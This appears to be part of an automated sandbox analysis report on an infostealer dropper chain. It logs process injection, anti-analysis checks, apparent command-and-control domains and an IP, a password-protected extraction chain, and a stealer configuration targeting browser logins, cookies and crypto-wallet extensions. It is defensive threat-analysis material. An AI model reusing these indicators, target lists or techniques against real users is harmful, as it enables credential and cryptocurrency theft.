Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0018652B mov eax, dword ptr fs:[00000030h] 1_2_0018652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018A302 mov eax, dword ptr fs:[00000030h] 5_2_0018A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018652B mov eax, dword ptr fs:[00000030h] 5_2_0018652B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 105A010 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 535010 value: 00
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: rapeflowwj.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: crosshuaht.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: sustainskelet.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: aspecteirs.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: energyaffai.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: necklacebudi.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: discokeyus.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: grannyejh.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: cheapptaxysu.click
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: treehoneyi.click
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 8060
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 6284
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe"
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00402744
Source: b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: BProgram Manager
Source: skotes.exe, skotes.exe, 00000005.00000002.2938873786.0000000000382000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 69Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016DD91 cpuid 5_2_0016DD91
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 6_2_0040247D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Queries volume information: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B0CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001565E0 LookupAccountNameA, 5_2_001565E0
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 6_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: procmon.exe
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: wireshark.exe
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 38.2.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.72f44ceb0a.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.72f44ceb0a.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, type: DROPPED
Source: Yara match File source: 5.2.skotes.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2930996247.0000000000151000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1713982339.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1683895756.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1724286059.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2281282422.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1754119546.0000000000151000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b2885fa695.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: b2885fa695.exe, 00000020.00000002.2764183695.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: b2885fa695.exe, 00000020.00000002.2764183695.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eh","ez":"TezBox"},{"en":"lodccjjbdhfakaekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: global traffic TCP traffic: 192.168.2.4:49902 -> 185.121.15.192:80
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
